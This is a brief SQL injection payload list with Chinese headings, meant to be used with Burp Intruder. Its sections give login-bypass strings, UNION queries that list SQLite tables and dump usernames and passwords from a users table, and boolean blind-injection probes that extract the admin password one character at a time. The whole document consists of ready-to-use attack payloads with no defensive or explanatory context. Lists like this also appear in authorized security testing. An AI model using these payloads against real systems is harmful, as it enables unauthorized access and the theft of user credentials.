# SQL 注入 Payload 清单
# 配合 Burp Intruder 使用
# ---------- 登录绕过 ----------
admin' OR '1'='1
admin' OR '1'='1' --
admin' --
" OR 1=1 --
admin') OR ('1'='1
# ---------- UNION 查询 ----------
1 UNION SELECT 1,2,3,4
1 UNION SELECT 1,sqlite_version(),3,4
1 UNION SELECT 1,group_concat(name),3,4 FROM sqlite_master WHERE type='table'
1 UNION SELECT 1,group_concat(username),group_concat(password),4 FROM users
# ---------- 布尔盲注 ----------
1' AND '1'='1
1' AND '1'='2
1' AND (SELECT length(password) FROM users WHERE username='admin')>5 --
1' AND (SELECT substr(password,1,1) FROM users WHERE username='admin')='a' --
# ---------- 其他 ----------
1 UNION SELECT 1,2,3,4,5
1 OR 1=1
